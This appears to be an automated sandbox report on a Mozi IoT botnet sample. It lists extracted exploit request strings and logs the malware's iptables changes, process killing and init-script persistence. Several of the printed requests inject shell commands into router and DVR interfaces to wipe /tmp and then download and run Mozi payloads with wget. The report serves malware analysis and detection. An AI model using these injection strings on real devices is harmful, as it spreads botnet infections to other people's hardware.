Source: Initial sample | Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample | Potential command found: GET /%s HTTP/1.1
Source: Initial sample | Potential command found: POST /%s HTTP/1.1
Source: Initial sample | Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample | Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample | Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample | Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample | Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample | Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample | Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample | Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample | Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample | Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample | Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Source: ELF static info symbol of initial sample | .symtab present: no
Source: Mozi.m, type: SAMPLE | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: /usr/networks, type: DROPPED | Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine | Classification label: mal100.spre.troj.evad.linM@0/230@0/0

              Persistence and Installation Behavior:

Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 3690) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 4353)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4364)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4390)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4408)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4429)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4440)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4467)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4478)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
              Sample reads /proc/mounts (often used for finding a writable filesystem)
              Source: /tmp/Mozi.m (PID: 3492)File: /proc/3492/mounts
              Sample tries to persist itself using /etc/profile
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/cedilla-portuguese.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/apps-bin-path.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/Z97-byobu.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/bash_completion.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/profile.d/vte-2.91.sh
              Sample tries to persist itself using System V runlevels
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/rcS.d/S95baby.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/rc.local
              Terminates several processes with shell command 'killall'
              Source: /bin/sh (PID: 3496)Killall command executed: killall -9 telnetd utelnetd scfgmgr
              Source: /bin/mkdir (PID: 3865)Directory: .cache
              Source: /bin/mkdir (PID: 3874)Directory: .cache
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/230/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/231/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2427/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/232/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/233/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/234/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/235/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/236/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/237/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/238/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/359/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1452/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2420/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/239/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/10/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1339/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/11/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/12/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/13/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/14/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/15/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/16/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/17/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/18/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/19/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1471/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/240/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/120/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/241/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/483/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/242/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/243/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/244/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1468/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2315/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2315/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/3/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/245/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1346/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2314/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2314/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/4/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/246/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/5/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/247/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/6/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/248/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/7/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/249/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/8/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/9/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/20/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/21/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/22/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/23/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/24/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/25/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/26/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/28/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/29/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1363/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1362/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/250/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/251/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/252/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/253/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/254/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/496/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/496/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/255/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2205/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/256/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/257/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/258/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/259/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2201/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/30/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/31/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/31/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2209/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2209/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/1119/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2220/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/260/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/261/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/262/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/263/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/264/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/385/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/144/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/386/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2217/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/145/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/266/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/146/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2215/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/147/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/148/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/149/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/2211/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/822/stat
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/822/cmdline
              Source: /usr/bin/killall (PID: 3496)File opened: /proc/47/stat
              Source: /tmp/Mozi.m (PID: 3494)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
              Source: /tmp/Mozi.m (PID: 3688)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3722)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3733)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3770)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3776)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3803)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3811)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 3815)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4027)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4030)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4033)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4044)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4076)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
              Source: /tmp/Mozi.m (PID: 4087)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
              Source: /tmp/Mozi.m (PID: 4100)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4127)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
              Source: /tmp/Mozi.m (PID: 4154)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
              Source: /tmp/Mozi.m (PID: 4175)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4192)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
              Source: /tmp/Mozi.m (PID: 4207)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
              Source: /tmp/Mozi.m (PID: 4235)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4241)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
              Source: /tmp/Mozi.m (PID: 4269)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
              Source: /tmp/Mozi.m (PID: 4279)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
              Source: /tmp/Mozi.m (PID: 4303)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
              Source: /tmp/Mozi.m (PID: 4321)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
              Source: /tmp/Mozi.m (PID: 4351)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4357)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4386)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4397)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4426)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4433)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4462)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT"
              Source: /tmp/Mozi.m (PID: 4471)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT"
              Source: /bin/egrep (PID: 3875)Grep executable: /bin/grep -> grep -E [^[:print:]] /home/user/.cache/logrotate/status
              Source: /bin/sh (PID: 3690)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3725)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3739)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3772)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
              Source: /bin/sh (PID: 3783)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3808)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3813)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
              Source: /bin/sh (PID: 3822)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
              Source: /bin/sh (PID: 4029)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4032)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4036)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4055)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4107)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4137)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4162)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4180)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4199)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 4216)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 4239)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 4251)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 4275)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 4285)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 4314)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 4328)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 4353)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4364)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4390)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4408)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
              Source: /bin/sh (PID: 4429)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4440)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4467)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
              Source: /bin/sh (PID: 4478)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
              Source: /sbin/resolvconf (PID: 3646)Mkdir executable: /bin/mkdir -> mkdir -p /run/resolvconf/interface
              Source: /bin/dash (PID: 3865)Mkdir executable: /bin/mkdir -> mkdir -p /home/user/.cache/logrotate
              Source: /bin/dash (PID: 3874)Mkdir executable: /bin/mkdir -> mkdir -p /home/user/.cache/upstart
              Source: /bin/dash (PID: 3928)Mktemp executable: /bin/mktemp -> mktemp
              Source: /bin/dash (PID: 4018)Rm executable: /bin/rm -> rm -f /tmp/tmp.vHWsTctARt
              Source: /tmp/Mozi.m (PID: 3678)Reads from proc file: /proc/stat
              Source: /tmp/Mozi.m (PID: 3492)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)
              Source: /tmp/Mozi.m (PID: 3492)File written: /usr/networks
              Source: /tmp/Mozi.m (PID: 3492)Shell script file created: /etc/rcS.d/S95baby.sh
              Source: /tmp/Mozi.m (PID: 3492)Shell script file created: /etc/init.d/S95baby.sh
              Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705qemu: uncaught target signal 11 (Segmentation fault) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705: exit code = 0

              Hooking and other Techniques for Hiding and Protection:

              Drops files in suspicious directories
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/S95baby.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountall.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/checkfs.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/umountnfs.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountkernfs.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/checkroot-bootclean.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountnfs-bootclean.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/bootmisc.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/checkroot.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/hwclock.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/hostname.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountdevsubfs.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountall-bootclean.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /etc/init.d/mountnfs.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /usr/bin/gettext.sh
              Source: /tmp/Mozi.m (PID: 3492)File: /usr/sbin/alsa-info.sh
              Source: /bin/dash (PID: 3193)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3225)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3249)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3280)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3305)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3333)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3369)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3397)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3425)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3453)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3534)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3558)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3586)Sleep executable: /bin/sleep -> sleep 1
              Source: /bin/dash (PID: 3614)Sleep executable: /bin/sleep -> sleep 1
              Source: /tmp/Mozi.m (PID: 3480)Queries kernel information via 'uname':
              Source: /tmp/Mozi.m (PID: 3492)Queries kernel information via 'uname':
              Source: /tmp/Mozi.m (PID: 3515)Queries kernel information via 'uname':
              Source: /sbin/modprobe (PID: 3691)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 4541)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 4568)Queries kernel information via 'uname':
